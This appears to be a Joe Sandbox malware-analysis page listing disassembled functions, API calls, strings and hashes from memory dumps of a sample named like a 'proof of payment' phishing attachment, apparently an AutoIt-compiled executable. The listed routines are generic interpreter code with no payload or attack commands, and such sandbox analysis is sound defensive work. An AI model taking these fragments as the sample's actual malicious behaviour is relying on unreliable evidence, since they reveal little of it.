Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 837b10138c2453baa1d1f6c98f8e98a268e5eceac752b3513f4774e905c96df5
Instruction ID: 536aef8f527fd6e90ce4d53b0cfc1e7b64e27eb064778f46fe73d55b0b4b08a6
Opcode Fuzzy Hash: 837b10138c2453baa1d1f6c98f8e98a268e5eceac752b3513f4774e905c96df5
Instruction Fuzzy Hash: 28A10631A04386AFD714DF65C884FAAB7A8FF44360F00851AFAA9D3580DB34E905EB91

Function 00FED8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00FED8EB
_wcscmp.LIBCMT ref: 00FED8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00FED924
CharUpperBuffW.USER32(?,00000000), ref: 00FED941
_wcscmp.LIBCMT ref: 00FED95F
_wcsstr.LIBCMT ref: 00FED970
GetClassNameW.USER32(00000018,?,00000400), ref: 00FED9A8
_wcscmp.LIBCMT ref: 00FED9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00FED9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 00FEDA28
_wcscmp.LIBCMT ref: 00FEDA38
GetClassNameW.USER32(00000010,?,00000400), ref: 00FEDA60
GetWindowRect.USER32(00000004,?), ref: 00FEDAC9

Strings

@, xrefs: 00FED8C6
ThumbnailClass, xrefs: 00FED9B3, 00FEDA33

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 2f1becec0e0b9ea93ba8c0186950aabc536e414a34f6620b3cd94f479a84b85d
Instruction ID: 5b99456c5957d25441a5d1b7311a1a724537a39608dfe626c51f328696dcbc69
Opcode Fuzzy Hash: 2f1becec0e0b9ea93ba8c0186950aabc536e414a34f6620b3cd94f479a84b85d
Instruction Fuzzy Hash: E281EA314083859FDB11DF51C881FAA7BE8FF84724F04446AFD859A096E738DD45EBA1

Function 00FED6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FED753

Strings

LAST, xrefs: 00FED718
[LAST, xrefs: 00FED800
[CLASS:, xrefs: 00FED7A3
ALL, xrefs: 00FED7E7
[ACTIVE, xrefs: 00FED740
CLASSNAME=, xrefs: 00FED790
ACTIVE, xrefs: 00FED72E
HANDLE=, xrefs: 00FED74C
[HANDLE:, xrefs: 00FED75F
[ALL, xrefs: 00FED7F9
[REGEXPTITLE:, xrefs: 00FED77B
REGEXP=, xrefs: 00FED768

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: d896331b7fd6876dd831f48678d4e33151516f08f91e38fb9f66ecab7703202c
Instruction ID: 190947b00584a29c43406054daf442cedadb6cb2ccd3f9ae67e64297fb416ec1
Opcode Fuzzy Hash: d896331b7fd6876dd831f48678d4e33151516f08f91e38fb9f66ecab7703202c
Instruction Fuzzy Hash: ED318131A44249A6EB14FB52DD53FED73799F20750F200029F481B54D5EF59AF04EA51

Function 00FEEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00FEEAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FEEAC2
SetWindowTextW.USER32(?,?), ref: 00FEEAD9
GetDlgItem.USER32(?,000003EA), ref: 00FEEAEE
SetWindowTextW.USER32(00000000,?), ref: 00FEEAF4
GetDlgItem.USER32(?,000003E9), ref: 00FEEB04
SetWindowTextW.USER32(00000000,?), ref: 00FEEB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FEEB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FEEB45
GetWindowRect.USER32(?,?), ref: 00FEEB4E
SetWindowTextW.USER32(?,?), ref: 00FEEBB9
GetDesktopWindow.USER32 ref: 00FEEBBF
GetWindowRect.USER32(00000000), ref: 00FEEBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00FEEC12
GetClientRect.USER32(?,?), ref: 00FEEC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00FEEC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FEEC6F

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 1d9eb8e5714cfee833f1f7d32b0af6cc14bbd9764599d84b1ae6ec4800b072c8
Instruction ID: 12f4e0f9baec56bb88a42bf2edb687cc5e971d161df2676072d3c03bf0d33207
Opcode Fuzzy Hash: 1d9eb8e5714cfee833f1f7d32b0af6cc14bbd9764599d84b1ae6ec4800b072c8
Instruction Fuzzy Hash: 57517D71900749EFDB20DFA9DD89F6EBBF9FF48704F004928E596A25A0D779A904DB00

Function 010079B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 010079C6
LoadCursorW.USER32(00000000,00007F00), ref: 010079D1
LoadCursorW.USER32(00000000,00007F03), ref: 010079DC
LoadCursorW.USER32(00000000,00007F8B), ref: 010079E7
LoadCursorW.USER32(00000000,00007F01), ref: 010079F2
LoadCursorW.USER32(00000000,00007F81), ref: 010079FD
LoadCursorW.USER32(00000000,00007F88), ref: 01007A08
LoadCursorW.USER32(00000000,00007F80), ref: 01007A13
LoadCursorW.USER32(00000000,00007F86), ref: 01007A1E
LoadCursorW.USER32(00000000,00007F83), ref: 01007A29
LoadCursorW.USER32(00000000,00007F85), ref: 01007A34
LoadCursorW.USER32(00000000,00007F82), ref: 01007A3F
LoadCursorW.USER32(00000000,00007F84), ref: 01007A4A
LoadCursorW.USER32(00000000,00007F04), ref: 01007A55
LoadCursorW.USER32(00000000,00007F02), ref: 01007A60
LoadCursorW.USER32(00000000,00007F89), ref: 01007A6B
GetCursorInfo.USER32(?), ref: 01007A7B

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 5d2b32ce6b448e9a060f74e9ebfe97da11a119f0aa6c6de1090158e8c766be39
Instruction ID: f464e949b00173726b40e201e8725793bd67ba28b1b2b1f689c6782cd05fc2ed
Opcode Fuzzy Hash: 5d2b32ce6b448e9a060f74e9ebfe97da11a119f0aa6c6de1090158e8c766be39
Instruction Fuzzy Hash: 6A3115B0D0431A6ADB519FF68C8995FBFE8FF44750F40452AA54DE7280DB7CA5408FA1

Function 00FBC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 00FCE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FBC8B7,?,00002000,?,?,00000000,?,00FB419E,?,?,?,0104DC00), ref: 00FCE984

Part of subcall function 00FB660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB53B1,?,?,00FB61FF,?,00000000,00000001,00000000), ref: 00FB662F

__wsplitpath.LIBCMT ref: 00FBC93E

Part of subcall function 00FD1DFC: __wsplitpath_helper.LIBCMT ref: 00FD1E3C

_wcscpy.LIBCMT ref: 00FBC953
_wcscat.LIBCMT ref: 00FBC968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00FBC978
SetCurrentDirectoryW.KERNEL32(?), ref: 00FBCABE

Part of subcall function 00FBB337: _wcscpy.LIBCMT ref: 00FBB36F

Strings

AU3!, xrefs: 00FBC90C
>>>AUTOIT SCRIPT<<<, xrefs: 0102311B
EA06, xrefs: 010230C9
#include depth exceeded. Make sure there are no recursive includes, xrefs: 01023098
Unterminated string, xrefs: 01023470
Bad directive syntax error, xrefs: 01023429
Error opening the file, xrefs: 010230B4, 0102313D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: da9aa20da9eb242c0b7734bc7106fcc8f1fd31a03db7bacf3cf6b69ea7dca880
Instruction ID: 57fae83191574e7eaf61d55c1dde99bddf8e9f2f78ab8d5f3f17f47dda172295
Opcode Fuzzy Hash: da9aa20da9eb242c0b7734bc7106fcc8f1fd31a03db7bacf3cf6b69ea7dca880
Instruction Fuzzy Hash: 19129C715083419FC724EF25C991AAFBBE9BF88300F04491EF5C997262DB38D949DB92

Function 0101CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0101CEFB
DestroyWindow.USER32(?,?), ref: 0101CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0101CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0101D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101D025
DestroyWindow.USER32(?), ref: 0101D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FB0000,00000000), ref: 0101D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101D094
GetDesktopWindow.USER32 ref: 0101D0A9
GetWindowRect.USER32(00000000), ref: 0101D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0101D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0101D0DA

Part of subcall function 00FCB526: GetWindowLongW.USER32(?,000000EB), ref: 00FCB537

Strings

0, xrefs: 0101CF1B
tooltips_class32, xrefs: 0101CFED, 0101D06E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 458a7e99864c2b056d1917f365e4dbf68cab7eb4f02bf59bd49e61310ab6d859
Instruction ID: fe844bbeffb0f30d63318203959c136f382d28837f334831c1135980dbc2b717
Opcode Fuzzy Hash: 458a7e99864c2b056d1917f365e4dbf68cab7eb4f02bf59bd49e61310ab6d859
Instruction Fuzzy Hash: 3B71BD70140205AFE721CF68CC89FA63BE9EB88744F444A1DFAC597295D739E942DB12

Function 0101F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FCB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FCB35F

DragQueryPoint.SHELL32(?,?), ref: 0101F37A

Part of subcall function 0101D7DE: ClientToScreen.USER32(?,?), ref: 0101D807
Part of subcall function 0101D7DE: GetWindowRect.USER32(?,?), ref: 0101D87D
Part of subcall function 0101D7DE: PtInRect.USER32(?,?,0101ED5A), ref: 0101D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 0101F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0101F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0101F411
_wcscat.LIBCMT ref: 0101F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0101F458
SendMessageW.USER32(?,000000B0,?,?), ref: 0101F471
SendMessageW.USER32(?,000000B1,?,?), ref: 0101F488
SendMessageW.USER32(?,000000B1,?,?), ref: 0101F4AA
DragFinish.SHELL32(?), ref: 0101F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0101F59C

Strings

@GUI_DRAGID, xrefs: 0101F510
@GUI_DRAGFILE, xrefs: 0101F54B
@GUI_DROPID, xrefs: 0101F4D1

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 948f9b3873aedccd731598bef7f04c388af093592eb3d350603eea9ea192d583
Instruction ID: eaaa2d904c992d40017abf5cff128bfaf32b632ae7a2e39631f49644d78964f5
Opcode Fuzzy Hash: 948f9b3873aedccd731598bef7f04c388af093592eb3d350603eea9ea192d583
Instruction Fuzzy Hash: FF614671108301AFC311EF64CC86E9FBBE8BB88714F404A1EF695961A1DB799A09DB52

Function 00FFAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00FFAB3D
VariantCopy.OLEAUT32(?,?), ref: 00FFAB46
VariantClear.OLEAUT32(?), ref: 00FFAB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00FFAC40
__swprintf.LIBCMT ref: 00FFAC70
VarR8FromDec.OLEAUT32(?,?), ref: 00FFAC9C
VariantInit.OLEAUT32(?), ref: 00FFAD4D
SysFreeString.OLEAUT32(00000016), ref: 00FFADDF
VariantClear.OLEAUT32(?), ref: 00FFAE35
VariantClear.OLEAUT32(?), ref: 00FFAE44
VariantInit.OLEAUT32(00000000), ref: 00FFAE80

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00FFAC6A
Default, xrefs: 00FFACFD

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: fff1cb99448252507357fd44f85246e27bde1087ecd3ab699ef10e4b55e49dd2
Instruction ID: 892518b451be1cf3b3e2140dbea8ccd5b62699cb7e27b800988bfec6fec38195
Opcode Fuzzy Hash: fff1cb99448252507357fd44f85246e27bde1087ecd3ab699ef10e4b55e49dd2
Instruction Fuzzy Hash: 09D1E5B2A04109DBCB24DF65D885BBEB7B5FF44710F148095E6099B2A4DB74EC40FBA2

Function 0101716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 010171FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01017247

Strings

SELECT, xrefs: 010173E0
GETITEMCOUNT, xrefs: 01017311
UNCHECK, xrefs: 0101740B
CHECK, xrefs: 01017267
ISCHECKED, xrefs: 010173B2
EXPAND, xrefs: 010172E1
GETSELECTED, xrefs: 0101733F
GETTOTALCOUNT, xrefs: 0101722A
COLLAPSE, xrefs: 0101728D
EXISTS, xrefs: 010172B0
GETTEXT, xrefs: 01017382

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: e5e6bf00f2b7a03e1079fcfbef054ddc9ee17e88fe4697fab11d0de918227d57
Instruction ID: 207a2a346e15280bd7c1c57b6c2495e268e07fb318dd9bbc35904562f441142b
Opcode Fuzzy Hash: e5e6bf00f2b7a03e1079fcfbef054ddc9ee17e88fe4697fab11d0de918227d57
Instruction Fuzzy Hash: 48916F302047019BDB04EF14CD52AAEBBE5BF94310F04485DF9965B3A7DB78E90ADB91

Function 0101E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0101E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0101BEAF), ref: 0101E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0101E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0101E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0101E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0101BEAF), ref: 0101E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0101E6DF
DestroyIcon.USER32(?,?,?,?,?,0101BEAF), ref: 0101E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0101E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0101E717

Part of subcall function 00FD0FA7: __wcsicmp_l.LIBCMT ref: 00FD1030

Strings

.icl, xrefs: 0101E521
.exe, xrefs: 0101E541
.dll, xrefs: 0101E564

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 4686ecf911273b10e09f2aaa29b3a770ef0e0a32cc0014443b7732ccfb7d5556
Instruction ID: 17c538018b7ebe6cd48d8a9c0d543aa3153a35ee298ec16bd64c3752ffffcc8f
Opcode Fuzzy Hash: 4686ecf911273b10e09f2aaa29b3a770ef0e0a32cc0014443b7732ccfb7d5556
Instruction Fuzzy Hash: A061E071500215FAEB25DF68CC46FFE7BACBB08764F504505F991D61C1EBB9A980CBA0

Function 00FFD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

CharLowerBuffW.USER32(?,?), ref: 00FFD292
GetDriveTypeW.KERNEL32 ref: 00FFD2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFD327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFD35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFD38C

Strings

type cdaudio alias cd wait, xrefs: 00FFD30A
closed, xrefs: 00FFD2A6, 00FFD2AF
open , xrefs: 00FFD2EE
close, xrefs: 00FFD298
wait, xrefs: 00FFD349
close cd wait, xrefs: 00FFD377
set cd door , xrefs: 00FFD32D
open, xrefs: 00FFD2B9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 7e53f7a6100cbe5e2bc556a2f90d1ad1969ead3e80df328683b428386e0c0f21
Instruction ID: 34b8139088aee344abe9a5fce23d908cecfc11cc9bb71ea29cb82e94ae272f52
Opcode Fuzzy Hash: 7e53f7a6100cbe5e2bc556a2f90d1ad1969ead3e80df328683b428386e0c0f21
Instruction Fuzzy Hash: C0514A715042059FC700EF11C9829AEB3E9FF98718F00485CF999AB261DB35ED05EF82

Function 00FF26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,01023973,00000016,0000138C,00000016,?,00000016,0104DDB4,00000000,?), ref: 00FF26F1
LoadStringW.USER32(00000000,?,01023973,00000016), ref: 00FF26FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,01023973,00000016,0000138C,00000016,?,00000016,0104DDB4,00000000,?,00000016), ref: 00FF271C
LoadStringW.USER32(00000000,?,01023973,00000016), ref: 00FF271F
__swprintf.LIBCMT ref: 00FF276F
__swprintf.LIBCMT ref: 00FF2780
_wprintf.LIBCMT ref: 00FF2829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FF2840

Strings

Line %d (File "%s"):, xrefs: 00FF2769
Error: , xrefs: 00FF27F7
%s (%d) : ==> %s: %s %s, xrefs: 00FF2824
^ ERROR, xrefs: 00FF27D5
Line %d:, xrefs: 00FF277A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
